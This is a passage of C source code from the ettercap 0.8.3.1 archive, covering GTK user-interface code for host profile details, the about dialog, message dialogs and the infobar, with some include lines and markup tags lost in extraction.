= gtk_label_new("Host Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); g_free(markup); row++; label = gtk_label_new("IP address:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(ip_addr_ntoa(&h->L3_addr, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); if (EC_GBL_OPTIONS->resolve) { row++; label = gtk_label_new("Hostname:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(h->hostname); if (!strcmp(h->hostname,"")) { /* resolve the hostname (using the cache) */ if (host_iptoa(&h->L3_addr, h->hostname) == -E_NOMATCH) { gtk_label_set_text(GTK_LABEL(label), "resolving..."); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LABEL; ro->widget = GTK_WIDGET(label); ro->ip = &h->L3_addr; detail_timer = g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { gtk_label_set_text(GTK_LABEL(label), h->hostname); } } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) { row++; label = gtk_label_new("Location:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(geoip_country_by_ip(&h->L3_addr)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } #endif if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) { row++; label = gtk_label_new("MAC address:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(mac_addr_ntoa(h->L2_addr, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); row++; label = gtk_label_new("Manufacturer:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(manuf_search(h->L2_addr)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } /* Connectivity information */ gtk_table_set_row_spacing(GTK_TABLE(table), row, 10); row++; label = gtk_label_new("Connectivity Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); g_free(markup); row++; label = gtk_label_new("Distance:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new((str = g_strdup_printf("%d", h->distance))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); g_free(str); row++; label = gtk_label_new("Type:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); if (h->type & FP_GATEWAY) label = gtk_label_new("GATEWAY"); else if (h->type & FP_HOST_LOCAL) label = gtk_label_new("LAN host"); else if (h->type & FP_ROUTER) label = gtk_label_new("REMOTE ROUTER"); else if (h->type & FP_HOST_NONLOCAL) label = gtk_label_new("REMOTE host"); else if (h->type == FP_UNKNOWN) label = gtk_label_new("unknown"); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); /* OS and service information */ gtk_table_set_row_spacing(GTK_TABLE(table), row, 10); row++; label = gtk_label_new("OS and Service Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+3, row, row+1, GTK_FILL, GTK_FILL, 0, 0); g_free(markup); if (h->os) { row++; label = gtk_label_new("Observed OS:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(h->os); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } row++; label = gtk_label_new("Fingerprint:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(h->fingerprint); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); row++; label = gtk_label_new("Operating System:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); if (fingerprint_search(h->fingerprint, os) == E_SUCCESS) { label = gtk_label_new(os); str = g_strdup_printf("unknown fingerprint (please submit it)\nNeares one is: %s", os); label = gtk_label_new(str); g_free(str); } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); LIST_FOREACH(o, &(h->open_ports_head), next) { row++; label = gtk_label_new("Fingerprint:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); str = g_strdup_printf("%s %d", (o->L4_proto == NL_TYPE_TCP) ? "TCP" : "UDP", ntohs(o->L4_addr)); label = gtk_label_new(str); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+2, row, row+1); g_free(str); str = g_strdup_printf("%s [%s]", service_search(o->L4_addr, o->L4_proto), (o->banner) ? o->banner : ""); label = gtk_label_new(str); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+2, col+3, row, row+1); g_free(str); LIST_FOREACH(u, &(o->users_list_head), next) { row++; if (u->failed) label = gtk_label_new("Account: *"); else label = gtk_label_new("Account:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); str = g_strdup_printf("%s / %s (%s)", u->user, u->pass, ip_addr_ntoa(&u->client, tmp)); label = gtk_label_new(str); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); g_free(str); if (u->info) { row++; label = gtk_label_new("Info:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach(GTK_TABLE(table), label, col, col+1, row, row+1, GTK_FILL, GTK_FILL, 0, 0); label = gtk_label_new(u->info); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, col+1, col+3, row, row+1); } } } /* resize table to the actual size */ gtk_table_resize(GTK_TABLE(table), row, ncols); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_from_stock(GTK_STOCK_CLOSE); g_signal_connect_swapped(G_OBJECT(button), "clicked", G_CALLBACK(gtkui_profile_detail_destroy), dwindow); gtk_box_pack_end(GTK_BOX(hbox), button, FALSE, FALSE, 0); gtk_widget_grab_focus(button); gtk_widget_show_all(dwindow); } static void gtkui_profile_detail_destroy(GtkWidget *widget, gpointer *data) { (void)data; if (detail_timer) g_source_remove(detail_timer); gtk_widget_destroy(widget); } static void gtkui_profiles_local(void) { profile_purge_local(); gtk_list_store_clear(GTK_LIST_STORE (ls_profiles)); } static void gtkui_profiles_remote(void) { profile_purge_remote(); gtk_list_store_clear(GTK_LIST_STORE (ls_profiles)); } static void gtkui_profiles_convert(void) { profile_convert_to_hostlist(); gtkui_refresh_host_list(NULL); gtkui_message("The hosts list was populated with local profiles"); } static void gtkui_profiles_dump(void *dummy) { /* variable not used */ (void) dummy; DEBUG_MSG("gtkui_profiles_dump"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, 50, sizeof(char)); gtkui_input("Log File :", logfile, 50, dump_profiles); } static void dump_profiles(void) { /* dump the profiles */ if (profile_dump_to_file(logfile) == E_SUCCESS) gtkui_message("Profiles dumped to file"); } static struct host_profile *gtkui_profile_selected(void) { GtkTreeIter iter; GtkTreeModel *model; struct host_profile *h = NULL; model = GTK_TREE_MODEL (ls_profiles); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 4, &h, -1); } else return(NULL); /* nothing is selected */ return(h); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/000775 000000 000000 00000000000 13711276346 017244 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3.c000664 000000 000000 00000161210 13711276346 020730 0ustar00rootroot000000 000000 /* ettercap -- GTK+3/GNOME GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* \Device\NPF{...} and description are huge. There should be 2 buffers * for this; one for dev-name and 1 for description. Note: dev->description * on WinPcap can contain and newlines! */ #define IFACE_LEN 100 /* globals */ GtkApplication *etterapp = NULL; GtkWidget *window = NULL; /* main window */ GtkWidget *notebook = NULL; GtkWidget *main_menu = NULL; GtkUIManager *menu_manager = NULL; guint merge_id; GTimer *progress_timer = NULL; GtkWidget *notebook_frame = NULL; GtkWidget *textview = NULL; GtkWidget *infobar = NULL; GtkWidget *infolabel = NULL; GtkWidget *infoframe = NULL; static guint infotimer = 0; GtkTextBuffer *msgbuffer = NULL; GtkTextMark *endmark = NULL; static gboolean progress_canceled = FALSE; static GtkWidget *progress_dialog = NULL; static GtkWidget *progress_bar = NULL; /* proto */ void gtkui_start(void); static void gtkui_init(void); static void gtkui_cleanup(void); static void gtkui_update(int target); static void gtkui_msg(const char *msg); gboolean gtkui_infobar_expired(gpointer data); static void gtkui_error(const char *msg); static void gtkui_fatal_error(const char *msg); static gboolean gtkui_flush_msg(gpointer data); static void gtkui_progress(char *title, int value, int max); GtkApplication* gtkui_setup(void * activate_func, gpointer activate_param); static void gtkui_build_widgets(GApplication* app, gpointer data); static void toggle_unoffensive(GSimpleAction *action, GVariant *value, gpointer data); static void toggle_nopromisc(GSimpleAction *action, GVariant *value, gpointer data); static void gtkui_file_open(GSimpleAction *action, GVariant *value, gpointer data); static void read_pcapfile(gchar *file); static void gtkui_file_write(GSimpleAction *action, GVariant *value, gpointer data); static void write_pcapfile(void); static void gtkui_set_iface_unified(GtkComboBox *combo, gpointer data); static void gtkui_set_iface_bridge(GtkComboBox *combo, gpointer data); static gboolean gtkui_bridged_switch(GtkSwitch *switcher, gboolean state, gpointer data); static gboolean gtkui_autostart_switch(GtkSwitch *switcher, gboolean state, gpointer data); static void gtkui_sniff(GtkButton *button, gpointer data); static void gtkui_pcap_filter(GSimpleAction *action, GVariant *value, gpointer data); static void gtkui_set_netmask(GSimpleAction *action, GVariant *value, gpointer data); static gboolean gtkui_progress_cancel(GtkWidget *window, gpointer data); #define ENABLED "true" #define DISABLED "false" /* wrapper functions which inject the real function call into the main * idle loop, ensugin only th emain thread performs GTK operations */ static gboolean gtkui_cleanup_shim(gpointer data) { /* variable not used */ (void) data; gtkui_cleanup(); return FALSE; } static void gtkui_cleanup_wrap(void) { g_idle_add(gtkui_cleanup_shim, NULL); } static gboolean gtkui_msg_shim(gpointer data) { gtkui_msg(data); SAFE_FREE(data); return FALSE; } static void gtkui_msg_wrap(const char *msg) { char *copy = strdup(msg); if (msg) { g_idle_add(gtkui_msg_shim, copy); } else { FATAL_ERROR("out of memory"); } } static gboolean gtkui_error_shim(gpointer data) { gtkui_error(data); SAFE_FREE(data); return FALSE; } static void gtkui_error_wrap(const char *msg) { char *copy = strdup(msg); if (msg) { g_idle_add(gtkui_error_shim, copy); } else { FATAL_ERROR("out of memory"); } } static gboolean gtkui_fatal_error_shim(gpointer data) { gtkui_fatal_error(data); SAFE_FREE(data); return FALSE; } static void gtkui_fatal_error_wrap(const char *msg) { char *copy = strdup(msg); if (msg) { gtkui_fatal_error_shim(copy); //g_idle_add(gtkui_fatal_error_shim, copy); } else { FATAL_ERROR("out of memory"); } } struct gtkui_input_data { char *title; char *input; size_t n; void (*callback)(void); }; struct gtkui_progress_data { char *title; int value; int max; }; static gboolean gtkui_progress_shim(gpointer data) { struct gtkui_progress_data *gpd = data; gdouble delay; gulong usec; delay = g_timer_elapsed(progress_timer, &usec); delay += usec / 1000000; /* render progress bar if not canceled or lasting longer than 750 ms */ if (!progress_canceled && delay >= 0.75) gtkui_progress(gpd->title, gpd->value, gpd->max); SAFE_FREE(gpd->title); SAFE_FREE(gpd); return FALSE; } static int gtkui_progress_wrap(char *title, int value, int max) { struct gtkui_progress_data *gpd; if (value <= 1) { g_timer_start(progress_timer); progress_canceled = FALSE; } if (progress_canceled == TRUE) { return UI_PROGRESS_INTERRUPTED; } if (!title) { return UI_PROGRESS_UPDATED; } gpd = malloc(sizeof *gpd); if (gpd) { gpd->title = strdup(title); gpd->value = value; gpd->max = max; g_idle_add(gtkui_progress_shim, gpd); } else { FATAL_ERROR("out of memory"); } return value == max ? UI_PROGRESS_FINISHED : UI_PROGRESS_UPDATED; } /********************************************/ void set_gtk_interface(void) { struct ui_ops ops; /* wipe the struct */ memset(&ops, 0, sizeof(ops)); /* register the functions */ ops.init = >kui_init; ops.start = >kui_start; ops.type = UI_GTK; ops.cleanup = >kui_cleanup_wrap; ops.msg = >kui_msg_wrap; ops.error = >kui_error_wrap; ops.fatal_error = >kui_fatal_error_wrap; ops.input = >kui_input; ops.progress = >kui_progress_wrap; ops.update = >kui_update; ui_register(&ops); DEBUG_MSG("GTK3 -> gtk+3 %d.%d.%d\n", gtk_major_version, gtk_minor_version, gtk_micro_version); } /* * prepare GTK, create the menu/messages window, enter the first loop */ static void gtkui_init(void) { DEBUG_MSG("gtkui_init"); if(!gtk_init_check(0, NULL)) { FATAL_ERROR("GTK3 failed to initialize. Is X running?"); return; } gtkui_conf_read(); /* try to explicitely enforce dark theme if preferred */ if (EC_GBL_CONF->gtkui_prefer_dark_theme) g_object_set(gtk_settings_get_default(), "gtk-application-prefer-dark-theme", TRUE, NULL); etterapp = gtkui_setup(gtkui_build_widgets, NULL); /* initialize timer */ progress_timer = g_timer_new(); /* gui init loop, calling gtkui_sniff (--> g_application_quit) will cause * this to exit so we can proceed to the main loop * later. */ g_application_run(G_APPLICATION(etterapp), 0, NULL); g_object_unref(G_OBJECT(etterapp)); EC_GBL_UI->initialized = 1; } /* * exit ettercap */ void gtkui_exit(GSimpleAction *action, GVariant *value, gpointer data) { int left, top, width, height; (void) action; (void) value; (void) data; DEBUG_MSG("gtkui_exit"); g_timer_destroy(progress_timer); gtk_window_get_position(GTK_WINDOW (window), &left, &top); gtk_window_get_size(GTK_WINDOW (window), &width, &height); gtkui_conf_set("window_left", left); gtkui_conf_set("window_top", top); gtkui_conf_set("window_width", width); gtkui_conf_set("window_height", height); g_object_unref(etterapp); gtkui_conf_save(); clean_exit(0); } /* * reset to the previous state */ static void gtkui_cleanup(void) { DEBUG_MSG("gtk_cleanup"); } /* * process an UI update notification */ static void gtkui_update(int target) { switch (target) { case UI_UPDATE_HOSTLIST: g_idle_add((GSourceFunc)gtkui_refresh_host_list, NULL); break; case UI_UPDATE_PLUGINLIST: g_idle_add((GSourceFunc)gtkui_refresh_plugin_list, NULL); break; } } /* * print a USER_MSG() extracting it from the queue */ static void gtkui_msg(const char *msg) { GtkTextIter iter; gchar *unicode = NULL; DEBUG_MSG("gtkui_msg: %s", msg); if((unicode = gtkui_utf8_validate((char *)msg)) == NULL) return; gtk_text_buffer_get_end_iter(msgbuffer, &iter); gtk_text_buffer_insert(msgbuffer, &iter, unicode, -1); gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview), endmark, 0, FALSE, 0, 0); return; } /* flush pending messages */ gboolean gtkui_flush_msg(gpointer data) { /* variable not used */ (void) data; ui_msg_flush(MSG_ALL); return(TRUE); } /* * display about dialog */ void gtkui_about(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *content, *scroll, *vbox, *logo, *label; GtkWidget *textview, *header, *stack, *stackswitch; GtkTextBuffer *textbuf; GtkTextIter iter; GError *error = NULL; const gchar *path, *unicode; gchar *license, *authors; gsize length; (void) action; (void) value; (void) data; header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), "About"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); gtk_header_bar_set_decoration_layout(GTK_HEADER_BAR(header), ":close"); dialog = gtk_dialog_new(); gtk_window_set_title(GTK_WINDOW(dialog), "About"); gtk_window_set_titlebar(GTK_WINDOW(dialog), header); gtk_window_set_modal(GTK_WINDOW(dialog), TRUE); gtk_window_set_transient_for(GTK_WINDOW(dialog), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dialog), GTK_WIN_POS_CENTER_ON_PARENT); gtk_window_set_default_size(GTK_WINDOW(dialog), 450, 300); stack = gtk_stack_new(); gtk_stack_set_transition_type(GTK_STACK(stack), GTK_STACK_TRANSITION_TYPE_SLIDE_LEFT_RIGHT); stackswitch = gtk_stack_switcher_new(); gtk_stack_switcher_set_stack(GTK_STACK_SWITCHER(stackswitch), GTK_STACK(stack)); gtk_header_bar_set_custom_title(GTK_HEADER_BAR(header), stackswitch); /* General page */ vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 10); path = INSTALL_DATADIR "/" PROGRAM "/" LOGO_FILE_SMALL; if(g_file_test(path, G_FILE_TEST_EXISTS)) logo = gtk_image_new_from_file(path); else /* if neither path is valid gtk will use a broken image icon */ logo = gtk_image_new_from_file("./share/" LOGO_FILE_SMALL); gtk_box_pack_start(GTK_BOX(vbox), logo, TRUE, TRUE, 0); label = gtk_label_new(""); gtk_label_set_markup(GTK_LABEL(label), "" PROGRAM " " EC_VERSION ""); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); label = gtk_label_new("www.ettercap-project.org"); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_box_pack_start(GTK_BOX(vbox), label, TRUE, TRUE, 0); label = gtk_label_new("#ettercap on FreeNode IRC"); gtk_box_pack_start(GTK_BOX(vbox), label, TRUE, TRUE, 0); label = gtk_label_new(" "); gtk_box_pack_start(GTK_BOX(vbox), label, TRUE, TRUE, 30); gtk_stack_add_titled(GTK_STACK(stack), vbox, "general", "General"); /* Authors page */ scroll= gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scroll), GTK_SHADOW_IN); /* load the authors file */ g_file_get_contents("./AUTHORS", &authors, &length, &error); if (error != NULL) { /* no debug message */ g_error_free(error); error = NULL; /* 2nd try */ g_file_get_contents(INSTALL_DATADIR "/" PROGRAM "/AUTHORS", &authors, &length, &error); if (error != NULL) { DEBUG_MSG("failed to load authors file: %s", error->message); gtkui_error("Failed to load AUTHORS file."); g_error_free(error); error = NULL; } } textview = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW(textview), FALSE); textbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW(textview)); if (authors && (unicode = gtkui_utf8_validate(authors)) != NULL) { gtk_text_buffer_get_end_iter(textbuf, &iter); gtk_text_buffer_insert(textbuf, &iter, unicode, -1); } gtk_container_add(GTK_CONTAINER(scroll), textview); gtk_stack_add_titled(GTK_STACK(stack), scroll, "authors", "Authors"); /* License page */ scroll= gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scroll), GTK_SHADOW_IN); /* load license file */ g_file_get_contents("./LICENSE", &license, &length, &error); if (error != NULL) { /* no debug message */ g_error_free(error); error = NULL; /* 2nd try */ g_file_get_contents(INSTALL_DATADIR "/" PROGRAM "/LICENSE", &license, &length, &error); #ifndef OS_WINDOWS if (error != NULL) { DEBUG_MSG("failed to load license file: %s, try system path ...", error->message); g_error_free(error); error = NULL; /* 3rd try */ g_file_get_contents("/usr/share/common-licenses/GPL-2", &license, &length, &error); } #endif if (error != NULL) { DEBUG_MSG("failed to load license file: %s", error->message); gtkui_error("Failed to load LICENSE file."); g_error_free(error); error = NULL; } } textview = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW(textview), FALSE); textbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW(textview)); if (license && (unicode = gtkui_utf8_validate(license)) != NULL) { gtk_text_buffer_get_end_iter(textbuf, &iter); gtk_text_buffer_insert(textbuf, &iter, unicode, -1); } gtk_container_add(GTK_CONTAINER(scroll), textview); gtk_stack_add_titled(GTK_STACK(stack), scroll, "license", "License"); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content), stack); // TODO Ctrl+w shall close the window gtk_widget_show_all(GTK_WIDGET(dialog)); gtk_dialog_run(GTK_DIALOG(dialog)); if (authors) g_free(authors); if (license) g_free(license); gtk_widget_destroy(dialog); } /* * reimplementation of gtk_message_dialog_new() to display a message * dialog with a header-bar since the GTK implementation has hardcoded * disabled this feature in the convenience function gtk_message_dialog_new() * and gtk_message_dialog_new() is also not meant anymore to display * images or icons indicating the type of message */ GtkWidget* gtkui_message_dialog(GtkWindow *parent, GtkDialogFlags flags, GtkMessageType type, GtkButtonsType buttons, const char *msg) { GtkWidget *dialog, *label, *icon, *button, *content, *box, *header; dialog = gtk_dialog_new(); /* implement flags */ if (parent) gtk_window_set_transient_for(GTK_WINDOW(dialog), parent); if (flags & GTK_DIALOG_MODAL) gtk_window_set_modal(GTK_WINDOW(dialog), TRUE); if (flags & GTK_DIALOG_DESTROY_WITH_PARENT) gtk_window_set_destroy_with_parent(GTK_WINDOW(dialog), TRUE); if (flags & GTK_DIALOG_USE_HEADER_BAR) { header = gtk_header_bar_new(); gtk_header_bar_set_decoration_layout(GTK_HEADER_BAR(header), ":close"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); gtk_window_set_titlebar(GTK_WINDOW(dialog), header); gtk_widget_show(header); } /* buttons */ switch (buttons) { case GTK_BUTTONS_OK: button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_OK", GTK_RESPONSE_OK); gtk_widget_grab_default(button); break; case GTK_BUTTONS_CLOSE: button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_Close", GTK_RESPONSE_CLOSE); gtk_widget_grab_default(button); break; case GTK_BUTTONS_CANCEL: button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_Cancel", GTK_RESPONSE_CANCEL); gtk_widget_grab_default(button); break; case GTK_BUTTONS_YES_NO: button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_Yes", GTK_RESPONSE_YES); gtk_widget_grab_default(button); button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_No", GTK_RESPONSE_NO); break; case GTK_BUTTONS_OK_CANCEL: button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_OK", GTK_RESPONSE_OK); gtk_widget_grab_default(button); button = gtk_dialog_add_button(GTK_DIALOG(dialog), "_Cancel", GTK_RESPONSE_CANCEL); break; default: // GTK_BUTTONS_NONE break; } /* create horizontal box for icon and message text */ box = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 6); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_set_border_width(GTK_CONTAINER(content), 10); gtk_container_add(GTK_CONTAINER(content), box); /* icon depending on message type */ switch (type) { case GTK_MESSAGE_INFO: gtk_window_set_title(GTK_WINDOW(dialog), "Information"); icon = gtk_image_new_from_icon_name("dialog-information", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start(GTK_BOX(box), icon, FALSE, FALSE, 0); break; case GTK_MESSAGE_WARNING: gtk_window_set_title(GTK_WINDOW(dialog), "Warning"); icon = gtk_image_new_from_icon_name("dialog-warning", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start(GTK_BOX(box), icon, FALSE, FALSE, 0); break; case GTK_MESSAGE_QUESTION: gtk_window_set_title(GTK_WINDOW(dialog), "Question"); icon = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start(GTK_BOX(box), icon, FALSE, FALSE, 0); break; case GTK_MESSAGE_ERROR: gtk_window_set_title(GTK_WINDOW(dialog), "Error"); icon = gtk_image_new_from_icon_name("dialog-error", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start(GTK_BOX(box), icon, FALSE, FALSE, 0); break; default: // GTK_MESSAGE_OTHER break; } /* message text */ label = gtk_label_new(msg); gtk_box_pack_start(GTK_BOX(box), label, FALSE, FALSE, 0); gtk_widget_show_all(box); return dialog; } /* * some minor notifications don't need a dedicated dialog * instead an the infobar widget is being used */ GtkWidget* gtkui_infobar_new(GtkWidget *infoframe) { infobar = gtk_info_bar_new(); gtk_widget_set_no_show_all(infobar, TRUE); infolabel = gtk_label_new(""); gtk_widget_show(infolabel); gtk_container_add(GTK_CONTAINER( gtk_info_bar_get_content_area(GTK_INFO_BAR(infobar))), infolabel); gtk_info_bar_add_button(GTK_INFO_BAR(infobar), "_OK", GTK_RESPONSE_OK); if (infoframe == NULL) infoframe = gtk_frame_new(NULL); gtk_widget_set_no_show_all(infoframe, TRUE); gtk_frame_set_shadow_type(GTK_FRAME(infoframe), GTK_SHADOW_NONE); gtk_container_add(GTK_CONTAINER(infoframe), infobar); g_signal_connect(G_OBJECT(infobar), "response", G_CALLBACK(gtkui_infobar_hide), NULL); return infoframe; } /* * show infobar */ void gtkui_infobar_show(GtkMessageType type, const gchar *msg) { if (!infobar && !infoframe) return; if (infobar == NULL) infoframe = gtkui_infobar_new(infoframe); gtk_label_set_text(GTK_LABEL(infolabel), msg); gtk_info_bar_set_message_type(GTK_INFO_BAR(infobar), type); gtk_info_bar_set_default_response(GTK_INFO_BAR(infobar), GTK_RESPONSE_OK); gtk_widget_show(infobar); gtk_widget_show(infoframe); infotimer = g_timeout_add_seconds(3, gtkui_infobar_expired, infobar); } /* * callback when info bar timer expired */ gboolean gtkui_infobar_expired(gpointer data) { gtkui_infobar_hide(GTK_WIDGET(data), 0, NULL); /* stop timer */ return FALSE; } /* * callback wrapper to hide infobar necessary due to still (Feb 2018) * unfixed animation bug: https://bugzilla.gnome.org/show_bug.cgi?id=710888 * implementing suggested workaround to remove and reattach widget */ void gtkui_infobar_hide(GtkWidget *widget, gint response, gpointer data) { (void) response; (void) data; (void) widget; if (!infobar || !infoframe) return; if (infotimer) g_source_remove(infotimer); gtk_widget_hide(infobar); gtk_widget_hide(infoframe); gtk_widget_destroy(infobar); infobar = NULL; } /* * print an error */ static void gtkui_error(const char *msg) { gchar *unicode = NULL; DEBUG_MSG("gtkui_error: %s", msg); if((unicode = 